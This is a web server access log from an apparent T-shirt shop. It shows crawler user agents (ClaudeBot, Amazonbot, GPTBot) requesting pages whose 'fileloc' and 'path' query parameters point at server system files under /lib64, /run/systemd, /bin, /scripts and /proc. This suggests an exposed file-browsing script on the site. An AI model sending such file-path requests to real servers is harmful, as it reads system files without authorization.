216.73.216.191 - - [25/Oct/2025:12:18:46 +0000] "GET /product/elgin-e-logo-spirit-wear-t-shirt-3?fileloc=%2F%2Frun%2Fsystemd%2Ftransient%2Fsession-27181597.scope&path=%2F%2Frun%2Fsystemd%2Ftransient HTTP/2.0" 200 2440 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.191 - - [25/Oct/2025:12:18:46 +0000] "GET /product/img/r_arrow.png?fileloc=%2F%2Flib64%2Flibgpgme.so.11.22.1&path=%2F%2Flib64 HTTP/2.0" 200 125286 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.191 - - [25/Oct/2025:12:18:46 +0000] "GET /product/htop.png?fileloc=%2F%2Fbin%2Fimunify360-command-wrapper&path=%2F%2Fbin HTTP/2.0" 200 5317 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
52.73.6.26 - - [25/Oct/2025:12:18:46 +0000] "GET /custom-t-shirts/?path=//opt/cpanel/ea-php82/root/var/db HTTP/1.1" 200 12902 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
216.73.216.191 - - [25/Oct/2025:12:18:47 +0000] "GET /product/img/sq_weight_fig2.png?fileloc=%2F%2Fscripts%2Ffixmailinglistperms&path=%2F%2Fscripts HTTP/2.0" 200 2702 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.191 - - [25/Oct/2025:12:18:47 +0000] "GET /product/wildcat-logo-spirit-wear-t-shirt-6?fileloc=%2F%2Frun%2Fsystemd%2Fsessions%2F29530309&path=%2F%2Frun%2Fsystemd%2Fsessions HTTP/2.0" 200 2430 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.191 - - [25/Oct/2025:12:18:47 +0000] "GET /product/htop.png?fileloc=%2F%2Flib64%2Flibexpat.so.1.6.7&path=%2F%2Flib64 HTTP/2.0" 200 68285 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.191 - - [25/Oct/2025:12:18:48 +0000] "GET /product/images/tcgraph.png?fileloc=%2F%2Flib64%2Flibpixman-1.so.0.38.4&path=%2F%2Flib64 HTTP/2.0" 200 220482 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.191 - - [25/Oct/2025:12:18:48 +0000] "GET /products/14086352.html?path=%2F HTTP/2.0" 200 3373 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.191 - - [25/Oct/2025:12:18:48 +0000] "GET /product/elgin-e-logo-spirit-wear-t-shirt-3?fileloc=%2F%2Frun%2Fsystemd%2Fsessions%2F29771109&path=%2F%2Frun%2Fsystemd%2Fsessions HTTP/2.0" 200 2432 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
20.171.207.136 - - [25/Oct/2025:12:18:48 +0000] "GET /?path=//proc/2/task/2/root/proc/2/root/sys/module/nf_conntrack/holders HTTP/2.0" 200 2836 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.191 - - [25/Oct/2025:12:18:48 +0000] "GET /product/elgin-e-logo-spirit-wear-t-shirt-3?fileloc=%2F%2Frun%2Fsystemd%2Fsessions%2F30087615&path=%2F%2Frun%2Fsystemd%2Fsessions HTTP/2.0" 200 2429 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
